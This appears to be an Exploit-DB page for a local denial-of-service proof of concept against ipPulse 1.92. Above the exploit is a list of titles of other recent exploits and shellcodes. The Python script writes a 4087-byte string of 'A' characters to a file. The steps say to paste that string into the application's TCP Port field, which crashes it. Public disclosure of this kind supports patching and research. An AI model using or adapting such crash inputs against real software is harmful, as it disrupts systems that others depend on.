
21 changes to exploits/shellcodes NASA openVSP 3.16.1 - Denial of Service (PoC) Immunity Debugger 1.85 - Denial of Service (PoC) ipPulse 1.92 - 'TCP Port' Denial of Service (PoC) Fathom 2.4 - Denial Of Service (PoC) Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC) Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC) HD Tune Pro 5.70 - Denial of Service (PoC) Drive Power Manager 1.10 - Denial Of Service (PoC) Easy PhotoResQ 1.0 - Denial Of Service (PoC) Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC) SIPP 3.3 - Stack-Based Buffer Overflow R 3.4.4 - Buffer Overflow (SEH) Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure phpMyAdmin 4.7.x - Cross-Site Request Forgery Episerver 7 patch 4 - XML External Entity Injection Argus Surveillance DVR 4.0.0.0 - Directory Traversal Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes) Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes) Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)
26 lines
No EOL
824 B
Python
Executable file
26 lines
No EOL
824 B
Python
Executable file
# Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
|
|
# Discovery by: Diego Santamaria
|
|
# Discovery Date: 2018-08-28
|
|
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
|
|
# Software Link: http://download.netscantools.com/ipls192.zip
|
|
# Tested Version: 1.92
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 7 Professional
|
|
|
|
# Steps to Reproduce:
|
|
|
|
# 1. Run the python code TCP_port.py
|
|
# 2. Open TCP_exploit.txt and copy the content
|
|
# 3. Open ipPulse.exe
|
|
# 4. Choose 'Target Editor'
|
|
# 5. write '1' in 'IP Adreess'
|
|
# 6. Paste the content from exploit.txt on 'TCP Port'
|
|
# 7. Press 'Add Above Fields to Target List'
|
|
# 8. Press ok and Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
content = "\x41" * 4087
|
|
f = open ("TCP_exploit.txt", "w")
|
|
f.write(content)
|
|
f.close() |